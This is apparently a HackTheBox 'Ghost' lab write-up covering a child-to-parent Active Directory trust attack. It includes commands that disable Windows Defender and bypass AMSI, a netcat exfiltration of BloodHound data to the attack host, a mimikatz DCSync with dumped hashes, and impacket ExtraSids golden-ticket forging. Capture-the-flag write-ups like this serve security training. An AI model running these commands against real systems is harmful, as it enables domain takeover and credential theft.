<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FVCpZI0Q7ErDPWLkxD9U9%2Fimage.png?alt=media&amp;token=2ac44733-a7c9-4c9a-b02b-7e9966a6b1ef" alt=""><figcaption></figcaption></figure>

```bash
PS C:\ProgramData> systeminfo

Host Name:                 PRIMARY
OS Name:                   Microsoft Windows Server 2022 Datacenter
OS Version:                10.0.20348 N/A Build 20348
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Primary Domain Controller
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00454-70295-72962-AA521
Original Install Date:     1/30/2024, 7:27:30 PM
System Boot Time:          6/2/2026, 9:17:40 AM
System Manufacturer:       Microsoft Corporation
System Model:              Virtual Machine
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version:              Microsoft Corporation Hyper-V UEFI Release v4.1, 12/3/2020
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     829 MB
Available Physical Memory: 66 MB
Virtual Memory: Max Size:  1,725 MB
Virtual Memory: Available: 410 MB
Virtual Memory: In Use:    1,315 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    corp.ghost.htb
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Microsoft Hyper-V Network Adapter
                                 Connection Name: Ethernet
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.0.0.10
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
```

* PRIMARY is a **separate domain controller** for `corp.ghost.htb`
* Has **bidirectional trust** with `ghost.htb`
* IP: `10.0.0.10`
* Main DC (`ghost.htb`) is at `10.0.0.254`

### Disabling the AV

No matter what tools we upload they are getting deleted this means there is an AV running in the background. so we need to disable it.

```ps1
# Disable Windows Defender real-time protection
Set-MpPreference -DisableRealtimeMonitoring $true

# Disable all Defender features
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableScriptScanning $true
Set-MpPreference -DisableBehaviorMonitoring $true

sc stop WinDefend


# Bypass AMSI in current session
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```

Now we can upload our files.

```powershell
iwr "http://10.10.15.204:8000/PowerView.ps1" -OutFile "PowerView.ps1"
Import-Module ./PowerView.ps1
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fi2rTOz91O79dWJTbs9No%2Fimage.png?alt=media&amp;token=17929de6-4fc4-4ed6-b7ea-6db11cc05a37" alt=""><figcaption></figcaption></figure>

corp.ghost.htb has bidirectional trust with ghost.htb.we can collect the bloodhound data for cleared picture. we can do that by using Sharphound.ps1

### Sharphound to collect loot

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FcGZkU6gLGw6POz763oqJ%2Fimage.png?alt=media&amp;token=fdd6e180-5989-4363-8667-e3b032ec7cfb" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMh0togP2Rqg2o3ztrMms%2Fimage.png?alt=media&amp;token=29d16c28-a4e8-4db9-9fff-e79a04ca0f1e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FEgmWTIXtLliLambmn8S9%2Fimage.png?alt=media&amp;token=9589031e-c0c2-4b1d-8e8f-a91d92f044b6" alt=""><figcaption></figcaption></figure>

send the data to attack host

```powershell
PS C:\ProgramData> cmd /c "C:\programdata\nc64.exe 10.10.15.204 9001 < C:\programdata\20260602205555_BloodHound.zip"
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F2A0Qm03TLTw6V966hjNf%2Fimage.png?alt=media&amp;token=20ac3b6a-8917-42a9-951f-4cdaf1843769" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fl07MrxTdiK6qb3kZixd7%2Fimage.png?alt=media&amp;token=340e3a39-7c53-4cbc-97ba-080e9ae87a54" alt=""><figcaption></figcaption></figure>

upload to bloodhound and map results.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fm2hAN2w5EM1nOpnyICw4%2Fimage.png?alt=media&amp;token=e56050ad-393d-4bbe-a784-447cbe0498c3" alt=""><figcaption></figcaption></figure>

The group **`ENTERPRISE DOMAIN CONTROLLERS@GHOST.HTB`** has an explicit **`GenericAll`** right directly over the **`CORP.GHOST.HTB`** domain object. Because we control a foothold on the `GHOST.HTB` side, we can leverage this trust relationship to take over the child/trusted domain.

The **Domain Controllers** group has:

* `GetChanges`
* `GetChangesAll`

on the domain object **CORP.GHOST.HTB**. Those rights together are the classic permissions required for **DCSync**.

The **PRIMARY$** computer account inherits rights through the **Domain Controllers** and **Enterprise Domain Controllers** groups.

## Attacking Domain Trusts - Child -> Parent Trusts&#x20;

The SidHistory attribute is used in migration scenarios. If a user in one domain is migrated to another domain, a new account is created in the second domain. The original user's SID will be added to the new user's SID history attribute, ensuring that the user can still access resources in the original domain

#### The attack is explained properly in AD Exploitation on HackTheBox

This attack allows for the compromise of a parent domain once the child domain has been compromised. Within the same AD forest, the [sidHistory](https://docs.microsoft.com/en-us/windows/win32/adschema/a-sidhistory) property is respected due to a lack of [SID Filtering](https://web.archive.org/web/20220812183844/https:/www.serverbrain.org/active-directory-2008/sid-history-and-sid-filtering.html) protection. SID Filtering is a protection put in place to filter out authentication requests from a domain in another forest across a trust. Therefore, if a user in a child domain that has their sidHistory set to the Enterprise Admins group (which only exists in the parent domain), they are treated as a member of this group, which allows for administrative access to the entire forest. In other words, we are creating a Golden Ticket from the compromised child domain to compromise the parent domain.

To perform this attack after compromising a child domain, we need the following:

* The KRBTGT hash for the child domain
* The SID for the child domain
* The name of a target user in the child domain (does not need to exist!)
* The FQDN of the child domain.
* The SID of the Enterprise Admins group of the root domain.

### Golden Ticket Attack From Linux

#### DCSync using mimikatz

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F0MygdtWKOCF6zklsXHhK%2Fimage.png?alt=media&amp;token=d2e48b30-fd8e-4606-9d34-22e1f83f6c96" alt=""><figcaption></figcaption></figure>

```powershell
PS C:\ProgramData> ./mimikatz.exe 'lsadump::dcsync /all /csv' exit
./mimikatz.exe 'lsadump::dcsync /all /csv' exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /all /csv
[DC] 'corp.ghost.htb' will be the domain
[DC] 'PRIMARY.corp.ghost.htb' will be the DC server
[DC] Exporting domain 'corp.ghost.htb'
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502     krbtgt  69eb46aa347a8c68edb99be2725403ab        514
500     Administrator   41515af3ada195029708a53d941ab751        512
1000    PRIMARY$        27f92da5e3d79962020ddebc08ed7d70        532480
1103    GHOST$  58d7c9777897d639bafc0a767b230a81        2080

mimikatz(commandline) # exit
Bye!
PS C:\ProgramData> 

```

`GHOST$` account is the Inter-Domain Trust Key between the child domain (CORP.GHOST.HTB) and the parent root domain (GHOST.HTB).

To forge the inter-domain trust ticket, two pieces of information were needed from the parent domain: the **Domain SID** and the **SID of the Enterprise Admins group**. `impacket-lookupsid` was run against the parent DC using `justin.bradley`'s credentials to retrieve these values.

```powershell
──(ajay㉿kali)-[~/Tools/mimikatz/x64]
└─$ impacket-lookupsid ghost.htb/justin.bradley:'Qwertyuiop1234$$'@10.129.231.105 | grep "Domain SID"
[*] Domain SID is: S-1-5-21-4084500788-938703357-3654145966
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~/Tools/mimikatz/x64]
└─$ impacket-lookupsid ghost.htb/justin.bradley:'Qwertyuiop1234$$'@10.129.231.105 | grep "Enterprise"
498: GHOST\Enterprise Read-only Domain Controllers (SidTypeGroup)
519: GHOST\Enterprise Admins (SidTypeGroup)
527: GHOST\Enterprise Key Admins (SidTypeGroup)
```

#### Forging Inter Domain Trust Ticket using Ticketer

With all the required material gathered, `impacket-ticketer` was used to forge the inter-domain trust ticket. The `GHOST$` trust account hash was used as the encryption key (`-nthash`), as this is the shared secret between the two domains. The child domain SID was passed via `-domain-sid`, and the Enterprise Admins SID from the parent domain was injected into the PAC using `-extra-sid`. The ticket was saved as `ghost_trust.ccache` and loaded into the session.

```bash
──(ajay㉿kali)-[~]
└─$ impacket-ticketer \
  -nthash 58d7c9777897d639bafc0a767b230a81 \
  -domain-sid S-1-5-21-2034262909-2733679486-179904498 \
  -domain CORP.GHOST.HTB \
  -extra-sid S-1-5-21-4084500788-938703357-3654145966-519 \
  -user Administrator \
  -spn krbtgt/GHOST.HTB \
  ghost_trust
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for CORP.GHOST.HTB/ghost_trust
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in ghost_trust.ccache
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ export KRB5CCNAME=ghost_trust.ccache
```

The forged TGT alone is not enough to access resources directly — a service ticket was needed. `impacket-getST` was used to request a CIFS service ticket for `dc01.ghost.htb` using the forged TGT, authenticating as Administrator against the parent domain DC. The resulting ticket was saved and loaded:

```bash
┌──(ajay㉿kali)-[~]
└─$ impacket-getST \
  -k \
  -no-pass \
  -spn cifs/dc01.ghost.htb \
  GHOST.HTB/Administrator \
  -dc-ip 10.129.8.220
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies 

[*] Getting ST for user
[*] Saving ticket in Administrator@cifs_dc01.ghost.htb@GHOST.HTB.ccache
                                                                                                                    
┌──(ajay㉿kali)-[~]
└─$ export KRB5CCNAME=Administrator@cifs_dc01.ghost.htb@GHOST.HTB.ccache
                                                                                                                    
┌──(ajay㉿kali)-[~]
└─$ klist
Ticket cache: FILE:Administrator@cifs_dc01.ghost.htb@GHOST.HTB.ccache
Default principal: ghost_trust@CORP.GHOST.HTB

Valid starting       Expires              Service principal
06/03/2026 01:20:09  06/03/2026 11:20:09  cifs/dc01.ghost.htb@GHOST.HTB
        renew until 06/04/2026 01:20:09

```

`klist` confirmed the ticket was valid and scoped to `cifs/dc01.ghost.htb@GHOST.HTB`. With a valid CIFS service ticket in the context of Enterprise Admins, `impacket-secretsdump` was run against `dc01.ghost.htb` to DCSync the entire `ghost.htb` domain, dumping all credential material including the Administrator NTLM hash, which was then used to gain a shell via Evil-WinRM.

```bash
──(ajay㉿kali)-[~]
└─$ impacket-secretsdump -k -no-pass -just-dc dc01.ghost.htb
Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
<SNIP>
```

## Shell as Administrator on DC

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FCpGvguSJ1Wpmfno9XV5j%2Fimage.png?alt=media&amp;token=1e6ccb7c-9c03-4668-9aad-ccf8e8a61ad3" alt=""><figcaption></figcaption></figure>

```
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---          6/2/2026   7:37 PM             34 root.txt
```

## Key Takeaways

**LDAP Injection** — The intranet login form passed credentials directly into an LDAP query without sanitisation. Submitting wildcard characters (`*`) in both fields bypassed authentication entirely, and the same vulnerability was leveraged to brute-force plaintext passwords character by character.

**Path Traversal via Custom CMS Code** — A developer-added feature in the Ghost CMS appended a user-supplied query parameter to a file path with no validation. This allowed arbitrary file reads, including `/proc/1/environ`, which leaked the internal API key used to protect the next attack surface.

**Command Injection in Internal API** — The `/api-dev/scan` endpoint passed a user-supplied URL directly to `bash -c`. With the API key recovered via path traversal, this gave unauthenticated RCE from the perspective of the internal network.

**SSH ControlMaster Socket Reuse** — A persistent SSH multiplexing socket left open by another user allowed hijacking their authenticated session without any credentials, demonstrating the risk of leaving ControlMaster sockets accessible to other users on the same host.

**DNS Spoofing for NTLM Capture** — Having write access to DNS records allowed pointing a hostname referenced by an automated script to the attacker's machine, capturing the NTLM challenge-response of another user passively via Responder.

**Golden SAML** — Compromising the ADFS service account granted access to the Token Signing Certificate stored in Active Directory. This allowed forging cryptographically valid SAML assertions for any identity, bypassing federated authentication entirely without touching the target user's credentials.

**MSSQL Linked Server Abuse** — A linked server relationship between two MSSQL instances allowed impersonating the `sa` login on a remote server, enabling `xp_cmdshell` and achieving RCE on a separate host within the internal network.

**SeImpersonatePrivilege — EfsPotato** — The MSSQL service account held `SeImpersonatePrivilege`, which was abused using EfsPotato (a bypass of the CVE-2021-36942 patch) to impersonate `NT AUTHORITY\SYSTEM`.

**Inter-Forest Trust Ticket (ExtraSids Attack)** — Compromising the child domain (`corp.ghost.htb`) provided the `krbtgt` hash and trust account material needed to forge a Kerberos ticket with the Enterprise Admins SID injected into the PAC. Because SID Filtering is not enforced within a forest, the parent domain honoured the forged SID, enabling a full DCSync of `ghost.htb`.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cpts-track/htb-ghost.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
